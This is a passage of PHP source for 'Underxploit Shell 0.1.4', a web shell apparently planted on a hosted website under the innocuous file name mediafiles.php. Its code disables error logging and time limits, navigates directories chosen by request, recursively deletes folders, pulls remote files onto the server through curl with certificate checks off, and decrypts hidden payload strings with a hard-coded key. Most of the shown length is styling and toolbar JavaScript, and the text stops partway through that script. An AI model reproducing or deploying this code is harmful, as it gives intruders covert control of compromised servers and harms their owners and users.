File: C:/Inetpub/vhosts/alnaeem.server.ly/httpdocs/mediafiles.php
<?php
/*! Description & About
* Underxploit Shell 0.1.4
* Responsive Design
* Source Editor With Line Number
* Source Viewer With Syntax Highligter
* Simple Alert
* Without Log's
* Clean Url
* Fast Loading (Using Javascript Jump)
* With Hacking Tools
* Programmed By Wildan Izzudin
* Web Shell (c) 2019
* Fix On 01, Jun 2022 (Friday)
End !*/
error_reporting(0);
ob_start("ob_gzhandler");
$_POST = cl($_POST); $_GET = cl($_GET);
$_COOKIE = cl($_COOKIE);
$_UNDERXPLOIT = array_merge($_POST, $_GET);
$_UNDERXPLOIT = array_map("xp", $_UNDERXPLOIT);
$cookie = md5($_SERVER['HTTP_USER_AGENT']);
switch (true) {
case (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])])):
vb(md5($_SERVER['HTTP_HOST']) , $cookie);
}
function vb($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
function jmbt($str){
return htmlspecialchars($str, 2 | 1);
}
function mtr($y) {
print '<meta http-equiv="refresh" content="1;url=' . $y . '"/>';
return $y;
}
function op($d, $e) {
$fp = fopen($d, "w"); $ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $e);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
function perms($x_x) {
if($x_cv = @fileperms($x_x)){
$x_cz = 'u';
if(($x_cv & 0xC000) == 0xC000)$x_cz = 's';
elseif(($x_cv & 0xA000) == 0xA000)$x_cz = 'l';
elseif(($x_cv & 0x8000) == 0x8000)$x_cz = '-';
elseif(($x_cv & 0x6000) == 0x6000)$x_cz = 'b';
elseif(($x_cv & 0x4000) == 0x4000)$x_cz = 'd';
elseif(($x_cv & 0x2000) == 0x2000)$x_cz = 'c';
elseif(($x_cv & 0x1000) == 0x1000)
$x_cz = 'p';
$x_cz .= ($x_cv & 00400)? 'r':'-';
$x_cz .= ($x_cv & 00200)? 'w':'-';
$x_cz .= ($x_cv & 00100)? 'x':'-';
$x_cz .= ($x_cv & 00040)? 'r':'-';
$x_cz .= ($x_cv & 00020)? 'w':'-';
$x_cz .= ($x_cv & 00010)? 'x':'-';
$x_cz .= ($x_cv & 00004)? 'r':'-';
$x_cz .= ($x_cv & 00002)? 'w':'-';
$x_cz .= ($x_cv & 00001)? 'x':'-';
return $x_cz;
}
else return "- ?? -";
}
function deledir($str) {
switch (true) {
case (is_dir($str)): $hnd = opendir($str);
switch (true) {
case (!$hnd): return false;
break;
default:
while ($file = readdir($hnd)) {
switch (true) {
case ($file != '.' && $file != '..'): switch (true) {
case (!is_dir($str . "/" . $file)): unlink($str . "/" . $file);
break;
default: deledir($str . '/' . $file);
} break; }
}
closedir($hnd); rmdir($str); return true;
break; } break; }
}
function a($str) {
@define("x13", "\x31\x33\x33\x37", true);
$x14 = base64_decode($str);
$x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
$x19 = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, hash('sha256', x13, true) , substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)) , MCRYPT_MODE_CBC, $x16s) , "\0");
return $x19;
}
function x($b) {
$c = a($b); return $c;
}
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('html_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('file_uploads', 1);
@set_time_limit(0);
@clearstatcache();
@define("x5", "\x64\x69\x72\x3d", true);
@define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
@define("x6", "\x66\x69\x6c\x65\x3d", true);
@define("x9", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x7a\x6d\x64\x69\x20\x7a\x6d\x64\x69\x2d\x61\x6c\x65\x72\x74\x2d\x63\x69\x72\x63\x6c\x65\x2d\x6f\x20\x7a\x6d\x64\x69\x2d\x68\x63\x2d\x66\x77\x20\x7a\x6d\x64\x69\x2d\x68\x63\x2d\x34\x78\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x2f\x64\x69\x76\x3e", true);
switch (true) {
case ($_UNDERXPLOIT['dir']): $dir = str_replace("\\", "/", $_UNDERXPLOIT['dir']);
@chdir($dir);
break;
default: $dir = str_replace("\\", "/", getcwd());
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
function cl($str) {
$qos = strtolower(ini_get('magic_quotes_sybase'));
switch (true) {
case (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()):
case (is_array($str)): foreach($str as $k => $v) {
switch (true) {
case (is_array($v)): $str[$k] = cl($v);
break;
default: $str[$k] = (empty($qos) || $qos === 'off') ? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
}
} break; } return $str;
}
function xp($str) {
return (is_array($str)) ? array_map("rawurldecode", $str) : rawurldecode($str);
}
function r($str) {
print '<script type="text/javascript">window.location = "' . $str . '";</script>';
return $str;
}
function s($str) {
print 'notif({
type: "default",
msg: "<span class=\'alert\'><font color=\'#fff\'>' . $str . '</font>",
width: "all",
height: 100,
position: "center",
});';
return $str;
}
function bacot($str) {
print '<script type="text/javascript"> notif({
type: "default",
msg: "<span class=\'alert\'><font color=\'#fff\'>' . $str . '</font>",
width: "all",
height: 100,
position: "center",
});</script>';
return $str;
}
print '<!DOCTYPE html lang="en">
<head>
<title>UNDERXPLOIT SHELL 0.1.4 [ Minimized Version ]</title>
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<meta name="author" content="WILDAN IZZUDIN">
<meta name="theme-color" content="#1D9D73">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#1D9D73">
<meta name="msapplication-navbutton-color" content="#1D9D73">
<link rel="icon" href="//underxploit.github.io/core/favicon.ico" type="image/x-icon" />
<link rel="stylesheet" href="//underxploit.github.io/core/icons/material.css" />
<style>
@import url(https://fonts.googleapis.com/css?family=Play);img[alt*="www.000webhost.com"]{display:none}*{box-sizing:border-box}*:focus{outline:0}::-moz-selection{background-color:rgba(201,223,255,.1);color:#fff}body{font-size:14px;background-attachment:fixed;color:#fff;margin:auto;font-family:"Play";background-color:#202020;overflow:auto;box-sizing:border-box}code{font-family:"Play";word-wrap:break-word;background:rgba(0,0,0,.2);font-size:13px}pre{margin:0;border:1px solid #343436;white-space:pre-wrap;white-space:-moz-pre-wrap;white-space:-pre-wrap;white-space:-o-pre-wrap;word-wrap:break-word;font-size:13px;background:#222}a{text-decoration:none;color:#fff}input[type=file]::-webkit-file-upload-button{background:#1D9D73;border:1px solid #1D9D73;color:#1D9D73;font-size:14px;font-family:"Play";border-radius:2px;width:1px}input[type=file]{border:1px solid #343436;color:#fff;background:#323232;width:100%;font-size:14px;padding:7px;border-radius:2px;font-family:"Play"}select{-webkit-appearance:none;-moz-appearance:none;text-indent:1px}input[type=number]{-moz-appearance:textfield}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{-webkit-appearance:none;-moz-appearance:none;appearance:none;margin:0}input[type=text],input[type=number],input[type=password]{border:1px solid #343436;padding:9px;background:#323232;color:#fff;font-family:"Play";width:100%;border-radius:2px;font-size:14px}textarea{border:1px solid rgba(255,255,255,.1);width:100%;height:600px;padding:5px;background:none;color:#fff;font-family:"Play";font-size:13px;border-radius:2px}select{padding:9px;border:1px solid #343436;font-family:"Play";font-size:14px;background:#323232;width:100%;color:#fff;border-radius:2px;-webkit-appearance:none}.btn-exe{background:#1D9D73;color:#fff;font-family:"Play";padding:9px;border:1px solid #1D9D73;width:100%;border-radius:2px;font-size:14px;-webkit-transition:all 0.3s;-moz-transition:all 0.3s;transition:all 0.3s}.btn-exe:hover{background:none;border:1px solid #1D9D73;color:#1D9D73}.lawb{position:relative;bottom:3px;background:#1D9D73;color:#fff;font-family:"Play";padding:3px 7px;border:1px solid #1D9D73;width:100%;border-radius:2px;font-size:13px;-webkit-transition:all 0.3s;-moz-transition:all 0.3s;transition:all 0.3s}.tup{font-size:14px}.alert{font-family:"Play";color:#fff}.coL{width:469px;border:0 solid #ddd;background:#222;padding:3px;float:left;margin-left:2px;margin-right:2px;margin-bottom:2px;margin-top:3px;color:#222}.tools-content{padding:3px;margin:1px 2px 0 2px;background:none;border-radius:2px;border:1px solid #343436}.td-tools-left{padding:5px;width:30px;text-align:center}.td-tools-icon{width:50px;background:none;text-align:center}.td-tools-content{padding-left:5px;font-size:14px}.label-danger{color:red}.label-success{color:#1D9D73}.coR{width:343px;border:0;background:#222;margin-left:2px;margin-right:2px;margin-bottom:2px;margin-top:3px;padding:3px;float:left}table{width:100%}hr{border:0;height:1px;background-image:-webkit-linear-gradient(left,#343436,#343436,#343436);background-image:-moz-linear-gradient(left,#343436,#343436,#343436);background-image:-ms-linear-gradient(left,#343436,#343436,#343436);background-image:-o-linear-gradient(left,#343436,#343436,#343436)}h2{font-size:19px;font-weight:400}.th-nav{width:85px}.co-ontainer-2{max-width:820px;margin:auto;overflow:hidden;background:#222;box-shadow:0 1px 5px rgba(27,31,35,.15)!important}.co-ontainer-3{max-width:820px;margin:auto;overflow:hidden;background:none}.coL-panel{padding:1px;border:1px solid #343436;border-bottom:0;color:#fff;border-radius:2px;margin:2px;margin-bottom:0;background:none}.coR-panel{padding:1px;border:1px solid #343436;border-bottom:0;color:#fff;margin:2px;border-radius:2px;background:none}.main-content{padding:5px;margin-top:5px;background:none;border:0 solid #ddd;font-size:16px}.ex-hov:hover{background:rgba(52,52,63,.2);-webkit-transition:all 0.3s;-moz-transition:all 0.3s;transition:all 0.3s}.dir{background:#343436;padding:2px;margin-left:2px;margin-right:2px;margin-top:3px;margin-bottom:1px;font-size:15px}.dir-pallet{background:rgba(255,255,255,.1);padding:6px;text-align:left}.dir-td-left{width:50px;border-right:1px solid #1D9D73;font-size:14px}.dir-td-right{padding-left:5px;font-size:15px}@media screen and (max-width:2024px){select{padding:8px}#wh{display:display}.co-ontainer-2{width:100%;border-radius:0}.coL{width:467px;background:none:margin-bottom:3px;border:none}.coR{width:42%;float:right;border:none}}@media screen and (max-width:1024px){select{padding:8px}#wh{display:display}.co-ontainer-2{width:100%;border-radius:0}.coL{width:467px;background:none:margin-bottom:3px;border:none}.coR{width:42%;float:right;border:none}}@media screen and (max-width:780px){select{padding:9px}#wh{display:none}.co-ontainer-2{background:#222;border-radius:0;margin-top:0}.coL{padding:1px;width:auto;float:none}.coR{padding:1px;width:auto;float:none}}.footer{background:#343436;color:#fff;padding:8px;text-align:center;margin:auto;overflow:hidden;max-width:820px;-webkit-box-shadow:0 1px 4px 0 rgba(0,0,0,.14);-moz-box-shadow:0 1px 4px 0 rgba(0,0,0,.14);-ms-box-shadow:0 1px 4px 0 rgba(0,0,0,.14);-o-box-shadow:0 1px 4px 0 rgba(0,0,0,.14);box-shadow:0 1px 4px 0 rgba(0,0,0,.14)}.td-panel{border-right:1px solid #343436;padding:5px;padding-right:8px;width:40px;text-align:center;color:#fff}.td-panel-right{padding-left:3px;font-size:14px}.a:hover{color:#1D9D73;-webkit-transition:all 0.3s;-moz-transition:all 0.3s;transition:all 0.3s}.coL-option{padding:5px;border:1px solid #343436;margin:2px 2px 0 2px;background:none;font-size:13px;border-radius:2px;color:#fff}.coL-option td{font-size:14px}.coL-btn-option-active{padding:7px;background:none;border:0 solid rgba(255,255,255,.1);font-size:14px;font-family:"Play";width:100%;color:#fff}.coL-btn-option{padding:7px;background:#343436;border:1px solid #343436;font-size:14px;border-radius:2px;font-family:"Play";width:100%;color:#fff;-webkit-transition:all 0.3s;-moz-transition:all 0.3s;transition:all 0.3s}.coL-btn-option:hover{background:none;width:100%;color:#fff;border:1px solid #343436}.coL-option-panel{padding:5px;border:none;background:#343436;font-size:14px}.xa{background:#1D9D73;color:#fff;width:30px;height:30px;padding:5px;border:none;-webkit-transition:all 0.3s;-moz-transition:all 0.3s;transition:all 0.3s;border-radius:100%}.xa:hover{background:#343436;color:#1D9D73}.table-info{margin-top:3px;border-collapse:collapse;font-family:"Play"}.th-info{padding:6px;border:1px solid #343436;background:#343436;border-collapse:collapse;font-family:"Play";font-weight:400;color:#fff;font-size:14px}.td-info{padding:7px;border:1px solid #343436;background:none;font-family:"Play";font-size:14px}.table-file{margin-top:3px;font-family:"Play";padding-right:2px;padding-left:2px}.table-file tr:hover{background:rgba(52,52,63,.2);-webkit-transition:all 0.3s;-moz-transition:all 0.3s;transition:all 0.3s}.th-file{padding:6px;border:1px solid #343436;background:#343436;font-family:"Play";font-weight:400;font-size:14px;color:#fff}.td-file{font-size:14.3px;padding:4px;border:0;border-bottom:1px dashed #343436;background:none;font-family:"Play" color:#222}.wr{padding:10px 5px 10px 5px}.loader{border:2px solid #343436;border-radius:50%;border-top:2px solid #1D9D73;width:20px;height:20px;-webkit-animation:spin 600ms linear infinite;animation:spin 600ms linear infinite}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(360deg)}}@keyframes spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}#judul{text-transform:uppercase;float:left;margin-top:8px;font-weight:700;display:none}.atas{background:fixed;background-size:cover;text-align:center;padding:0;background-color:#222}@media screen and (max-width:2024px){select{padding:8px}#particles-js{height:300px}}@media screen and (max-width:1024px){select{padding:8px}#particles-js{height:300px}}@media screen and (max-width:780px){select{padding:9px}#particles-js{height:200px}}#particles-js{max-width:820px}input[type=checkbox]{display:none}.icon{text-align:center;display:inline-block}.icon .zmdi{visibility:hidden}input[type=checkbox]:checked + .icon .zmdi{position:relative;top:1px;right:1px;visibility:visible}input[type=checkbox]{display:inline\9}.icon{display:none\9}input[type=checkbox]{margin:0 .1em}.icon{background:none;border:1px solid #343436;border-radius:100px;text-align:center;font-size:15px;margin:2px auto 2px auto;height:20px;width:20px;line-height:2000px}.move-top{color:#fff;border-radius:3px;position:fixed;bottom:10px;right:10px;text-decoration:none;padding:15px 25px 15px 20px;display:none;background:rgba(0,0,0,.4)}.animated{-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}.animated.infinite{-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite}@-webkit-keyframes flash{from,50%,to{opacity:1}25%,75%{opacity:0}}@keyframes flash{from,50%,to{opacity:1}25%,75%{opacity:0}}.flash{-webkit-animation-name:flash;animation-name:flash}@-webkit-keyframes rubberBand{from{-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}30%{-webkit-transform:scale3d(1.25,.75,1);transform:scale3d(1.25,.75,1)}40%{-webkit-transform:scale3d(.75,1.25,1);transform:scale3d(.75,1.25,1)}50%{-webkit-transform:scale3d(1.15,.85,1);transform:scale3d(1.15,.85,1)}65%{-webkit-transform:scale3d(.95,1.05,1);transform:scale3d(.95,1.05,1)}75%{-webkit-transform:scale3d(1.05,.95,1);transform:scale3d(1.05,.95,1)}to{-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}}@keyframes rubberBand{from{-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}30%{-webkit-transform:scale3d(1.25,.75,1);transform:scale3d(1.25,.75,1)}40%{-webkit-transform:scale3d(.75,1.25,1);transform:scale3d(.75,1.25,1)}50%{-webkit-transform:scale3d(1.15,.85,1);transform:scale3d(1.15,.85,1)}65%{-webkit-transform:scale3d(.95,1.05,1);transform:scale3d(.95,1.05,1)}75%{-webkit-transform:scale3d(1.05,.95,1);transform:scale3d(1.05,.95,1)}to{-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}}.rubberBand{-webkit-animation-name:rubberBand;animation-name:rubberBand}.menus{padding:8px;text-align:right;background:none}.atas-ae{position:fixed;top:0;right:0;left:0;z-index:1030;padding:10px;margin:auto;max-width:820px}.top{margin-top:3px}.elip{max-width:100px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.wrap{word-wrap:break-word}.break{word-break:break-all;white-space:normal}#ui_notifIt{position:fixed;top:10px;right:10px;left:10px;cursor:none;overflow:hidden;-webkit-box-shadow:0 3px 5px rgba(0,0,0,.3);-moz-box-shadow:0 3px 5px rgba(0,0,0,.3);-o-box-shadow:0 3px 5px rgba(0,0,0,.3);box-shadow:0 3px 5px rgba(0,0,0,.3);-wekbit-border-radius:5px;-moz-border-radius:5px;-o-border-radius:5px;border-radius:5px;z-index:2000}#ui_notifIt:hover{opacity:1!important}#ui_notifIt p{text-align:center;font-family:sans-serif;font-size:14px;padding:0;margin:0}#notifIt_close{position:absolute;color:#FFF;top:0;padding:0 5px;right:0}#notifIt_close:hover{background-color:rgba(255,255,255,.3)}#ui_notifIt.default{background-color:#1D9D73;border:0;-webkit-box-shadow:0 1px 4px 0 rgba(0,0,0,.14);-moz-box-shadow:0 1px 4px 0 rgba(0,0,0,.14);-ms-box-shadow:0 1px 4px 0 rgba(0,0,0,.14);-o-box-shadow:0 1px 4px 0 rgba(0,0,0,.14);box-shadow:0 1px 4px 0 rgba(0,0,0,.14)}.notifit_confirm_bg,.notifit_prompt_bg{position:fixed;top:0;left:0;height:100%;width:100%;background-color:rgba(255,255,255,.1)}.notifit_confirm *,.notifit_prompt *{font-family:"Play"}.notifit_confirm,.notifit_prompt{position:fixed;top:0;left:0;padding:30px 30px 0 30px;background-color:#1D9D73;border:1px solid rgba(0,0,0,.1);-webkit-border-radius:5px;-moz-border-radius:5px;-ms-border-radius:5px;-o-border-radius:5px;border-radius:5px;-webkit-box-shadow:0 2px 10px rgba(0,0,0,.2);box-shadow:0 2px 10px rgba(0,0,0,.2)}.hljs{display:block;overflow-x:auto;font-size:13px;padding:.5em;background:#222;color:#e6e1dc}.hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}.hljs-keyword,.hljs-selector-tag{color:#c26230}.hljs-string,.hljs-number,.hljs-regexp,.hljs-variable,.hljs-template-variable{color:#1D9D73}.hljs-subst{color:#519f50}.hljs-tag,.hljs-name{color:#e8bf6a}.hljs-type{color:#da4939}.hljs-symbol,.hljs-bullet,.hljs-built_in,.hljs-builtin-name,.hljs-attr,.hljs-link{color:#6d9cbe}.hljs-params{color:#d0d0ff}.hljs-attribute{color:#cda869}.hljs-meta{color:#9b859d}.hljs-title,.hljs-section{color:#ffc66d}.hljs-addition{background-color:#144212;color:#e6e1dc;display:inline-block;width:100%}.hljs-deletion{background-color:#600;color:#e6e1dc;display:inline-block;width:100%}.hljs-selector-class{color:#9b703f}.hljs-selector-id{color:#8b98ab}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:700}.hljs-link{text-decoration:underline}::selection{background-color:#1D9D73;color:#fff}.linedwrap{border:1px solid #343436;padding:3px;padding-right:0;margin-top:5px}#paksa{padding:0 2px 0 2px}.linedtextarea{padding:0;margin:0}.linedtextarea,.linedwrap .codelines .lineno{font-size:13px;font-family:"Play";line-height:normal!important}.linedwrap .lines{margin-top:1px;width:45px;float:left;overflow:hidden;border-right:1px solid #1D9D73;margin-right:5px}.linedwrap .codelines{padding-top:6px}.linedwrap .codelines .lineno{color:#AAA;padding-right:5px;padding-top:0em;text-align:right;white-space:nowrap;font-family:"Play"}.linedwrap .codelines .lineselect{color:#1D9D73}.tool-container,.tool-item,.btn-toolbar{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}.btn-toolbar{background:#1D9D73;width:20px;height:20px;text-align:center;padding:7px;border-radius:4px;display:block;transition:none}.btn-toolbar>i{color:#02baf2;font-size:16px}.btn-toolbar:hover{background:#02baf2;cursor:pointer}.btn-toolbar:hover>i{color:white}.btn-toolbar-dark{background-color:#1D9D73}.btn-toolbar-dark.pressed{background-color:#5e696d}.btn-toolbar-dark:hover{background-color:#5e696d}.btn-toolbar-dark>i{color:white}.tool-container{background-color:#5e696d;background-size:100% 100%;border-radius:4px;position:absolute}.tool-container.tool-top,.tool-container.tool-bottom{height:34px;border-bottom:0 solid #beb8b8}.tool-container.tool-top .tool-item,.tool-container.tool-bottom .tool-item{float:left;border-right:0;border-left:0}.tool-item{height:100%;display:block;width:20px;height:20px;text-align:center;padding:7px;transition:none}.tool-item>.zmdi{color:#b2c6cd;font-size:15px;margin-top:3px}.tool-item.selected,.tool-item:hover{background:#02baf2}.tool-item.selected>.zmdi,.tool-item:hover>.zmdi{color:white}.tool-top .tool-item:first-child:hover,.tool-bottom .tool-item:first-child:hover{border-top-left-radius:4px;border-bottom-left-radius:4px}.tool-top .tool-item:last-child:hover,.tool-bottom .tool-item:last-child:hover{border-top-right-radius:4px;border-bottom-right-radius:4px}.tool-vertical-top .tool-item:first-child:hover,.tool-vertical-bottom .tool-item:first-child:hover,.tool-right .tool-item:first-child:hover,.tool-left .tool-item:first-child:hover{border-top-left-radius:4px;border-top-right-radius:4px}.tool-vertical-top .tool-item:last-child:hover,.tool-vertical-bottom .tool-item:last-child:hover,.tool-right .tool-item:last-child:hover,.tool-left .tool-item:last-child:hover{border-bottom-left-radius:4px;border-bottom-right-radius:4px}.tool-container .arrow{width:0;height:0;position:absolute;border-width:7px;border-style:solid}.tool-container.tool-top .arrow{border-color:#5e696d transparent transparent;left:50%;bottom:-14px;margin-left:-7px}.tool-container.tool-bottom .arrow{border-color:transparent transparent #5e696d;left:50%;top:-14px;margin-left:-7px}.tool-container.tool-left .arrow{border-color:transparent transparent transparent #5e696d;top:50%;right:-14px;margin-top:-7px}.tool-container.tool-right .arrow{border-color:transparent #5e696d transparent transparent;top:50%;left:-14px;margin-top:-7px}.toolbar-dark{background-color:#1D9D73}.toolbar-dark.tool-top .arrow{border-color:#1D9D73 transparent transparent}.toolbar-dark.tool-bottom .arrow{border-color:transparent transparent #1D9D73}.toolbar-dark.tool-left .arrow{border-color:transparent transparent transparent #1D9D73}.toolbar-dark.tool-right .arrow{border-color:transparent #1D9D73 transparent transparent}.toolbar-dark .tool-item>.zmdi{color:white}.toolbar-dark .tool-item.selected,.toolbar-dark .tool-item:hover{background:#343436;color:white}.animate-standard{-webkit-animation:standardAnimate 0.3s 1 ease}.animate-flyin{-webkit-animation:rotateAnimate 0.5s 1 ease}.animate-grow{-webkit-animation:growAnimate 0.4s 1 ease}.animate-flip{-webkit-animation:flipAnimate 0.4s 1 ease}.animate-bounce{-webkit-animation:bounceAnimate 0.4s 1 ease-out}@-webkit-keyframes rotateAnimate{from{transform:rotate(180deg) translate(-120px);opacity:0}to{transform:rotate(0deg) translate(0);opacity:1}}@-webkit-keyframes standardAnimate{from{transform:translateY(20px);opacity:0}to{transform:translateY(0);opacity:1}}@-webkit-keyframes growAnimate{0%{transform:scale(0) translateY(40px);opacity:0}70%{transform:scale(1.5) translate(0)}100%{transform:scale(1) translate(0);opacity:1}}@-webkit-keyframes rotate2Animate{from{transform:rotate(-90deg);transform-origin:0% 100%;opacity:0}to{transform:rotate(0deg);opacity:1}}@-webkit-keyframes flipAnimate{from{transform:rotate3d(2,2,2,180deg);opacity:0}to{transform:rotate3d(0,0,0,0deg);opacity:1}}@-webkit-keyframes bounceAnimate{0%{transform:translateY(40px);opacity:0}30%{transform:translateY(-40px)}70%{transform:translateY(20px)}100%{transform:translateY(0);opacity:1}}.hidden{display:none}
</style>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script>
<script src="//importantscripts.github.io/encryptor.min.js"></script>
<script type="text/javascript">
if ( typeof Object.create !== \'function\' ) {
Object.create = function( obj ) {
function F() {}
F.prototype = obj;
return new F();
};
}
(function( $, window, document, undefined ) {
var ToolBar = {
init: function( options, elem ) {
var self = this;
self.elem = elem;
self.$elem = $( elem );
self.options = $.extend( {}, $.fn.toolbar.options, options );
self.metadata = self.$elem.data();
self.overrideOptions();
self.toolbar = $(\'<div class="tool-container" />\')
.addClass(\'tool-\'+self.options.position)
.addClass(\'toolbar-\'+self.options.style)
.append(\'<div class="tool-items" />\')
.append(\'<div class="arrow" />\')
.appendTo(\'body\')
.css(\'opacity\', 0)
.hide();
self.toolbar_arrow = self.toolbar.find(\'.arrow\');
self.initializeToolbar();
},
overrideOptions: function() {
var self = this;
$.each( self.options, function( $option ) {
if (typeof(self.$elem.data(\'toolbar-\'+$option)) != "undefined") {
self.options[$option] = self.$elem.data(\'toolbar-\'+$option);
}
});
},
initializeToolbar: function() {
var self = this;
self.populateContent();
self.setTrigger();
self.toolbarWidth = self.toolbar.width();
},
setTrigger: function() {
var self = this;
if (self.options.event != \'click\') {
var moveTime;
function decideTimeout () {
if (self.$elem.hasClass(\'pressed\')) {
moveTime = setTimeout(function() {
self.hide();
}, 150);
} else {
clearTimeout(moveTime);
};
};
self.$elem.on({
mouseenter: function(event) {
if (self.$elem.hasClass(\'pressed\')) {
clearTimeout(moveTime);
} else {
self.show();
}
}
});
self.$elem.parent().on({
mouseleave: function(event){ decideTimeout(); }
});
$(\'.tool-container\').on({
mouseenter: function(event){ clearTimeout(moveTime); },
mouseleave: function(event){ decideTimeout(); }
});
}
if (self.options.event == \'click\') {
self.$elem.on(\'click\', function(event) {
event.preventDefault();
if(self.$elem.hasClass(\'pressed\')) {
self.hide();
} else {
self.show();
}
});
if (self.options.hideOnClick) {
$(\'html\').on("click.toolbar", function ( event ) {
if (event.target != self.elem &&
self.$elem.has(event.target).length === 0 &&
self.toolbar.has(event.target).length === 0 &&
self.toolbar.is(":visible")) {
self.hide();
}
});
}
}
if (self.options.hover) {
var moveTime;
function decideTimeout () {
if (self.$elem.hasClass(\'pressed\')) {
moveTime = setTimeout(function() {
self.hide();
}, 150);
} else {
clearTimeout(moveTime);
};
};
self.$elem.on({
mouseenter: function(event) {
if (self.$elem.hasClass(\'pressed\')) {
clearTimeout(moveTime);
} else {
self.show();
}
}
});
self.$elem.parent().on({
mouseleave: function(event){ decideTimeout(); }
});
$(\'.tool-container\').on({
mouseenter: function(event){ clearTimeout(moveTime); },
mouseleave: function(event){ decideTimeout(); }
});
}
$(window).resize(function( event ) {
event.stopPropagation();
if ( self.toolbar.is(":visible") ) {
self.toolbarCss = self.getCoordinates(self.options.position, 20);
self.collisionDetection();
self.toolbar.css( self.toolbarCss );
self.toolbar_arrow.css( self.arrowCss );
}
});
},
populateContent: function() {
var self = this;
var location = self.toolbar.find(\'.tool-items\');
var content = $(self.options.content).clone( true ).find(\'a\').addClass(\'tool-item\');
location.html(content);
location.find(\'.tool-item\').on(\'click\', function(event) {
event.preventDefault();
self.$elem.trigger(\'toolbarItemClick\', this);
});
},
calculatePosition: function() {
var self = this;
self.arrowCss = {};
self.toolbarCss = self.getCoordinates(self.options.position, self.options.adjustment);
self.toolbarCss.position = \'absolute\';
self.toolbarCss.zIndex = self.options.zIndex;
self.collisionDetection();
self.toolbar.css(self.toolbarCss);
self.toolbar_arrow.css(self.arrowCss);
},
getCoordinates: function( position, adjustment ) {
var self = this;
self.coordinates = self.$elem.offset();
if (self.options.adjustment && self.options.adjustment[self.options.position]) {
adjustment = self.options.adjustment[self.options.position] + adjustment;
}
switch(self.options.position) {
case \'top\':
return {
left: self.coordinates.left-(self.toolbar.width()/2)+(self.$elem.outerWidth()/2),
top: self.coordinates.top-self.$elem.outerHeight()-adjustment,
right: \'auto\'
};
case \'left\':
return {
left: self.coordinates.left-(self.toolbar.width()/2)-(self.$elem.outerWidth()/2)-adjustment,
top: self.coordinates.top-(self.toolbar.height()/2)+(self.$elem.outerHeight()/2),
right: \'auto\'
};
case \'right\':
return {
left: self.coordinates.left+(self.toolbar.width()/2)+(self.$elem.outerWidth()/2)+adjustment,
top: self.coordinates.top-(self.toolbar.height()/2)+(self.$elem.outerHeight()/2),
right: \'auto\'
};
case \'bottom\':
return {
left: self.coordinates.left-(self.toolbar.width()/2)+(self.$elem.outerWidth()/2),
top: self.coordinates.top+self.$elem.outerHeight()+adjustment,
right: \'auto\'
};
}
},
collisionDetection: function() {
var self = this;
var edgeOffset = 20;
if(self.options.position == \'top\' || self.options.position == \'bottom\') {
self.arrowCss = {left: \'50%\', right: \'50%\'};
if( self.toolbarCss.left < edgeOffset ) {
self.toolbarCss.left = edgeOffset;
self.arrowCss.left = self.$elem.offset().left + self.$elem.width()/2-(edgeOffset);
}
else if(($(window).width() - (self.toolbarCss.left + self.toolbarWidth)) < edgeOffset) {
self.toolbarCss.right = edgeOffset;
self.toolbarCss.left = \'auto\';
self.arrowCss.left = \'auto\';
self.arrowCss.right = ($(window).width()-self.$elem.offset().left)-(self.$elem.width()/2)-(edgeOffset)-5;
}
}
},
show: function() {
var self = this;
self.$elem.addClass(\'pressed\');
self.calculatePosition();
self.toolbar.show().css({\'opacity\': 1}).addClass(\'animate-\'+self.options.animation);
self.$elem.trigger(\'toolbarShown\');
},
hide: function() {
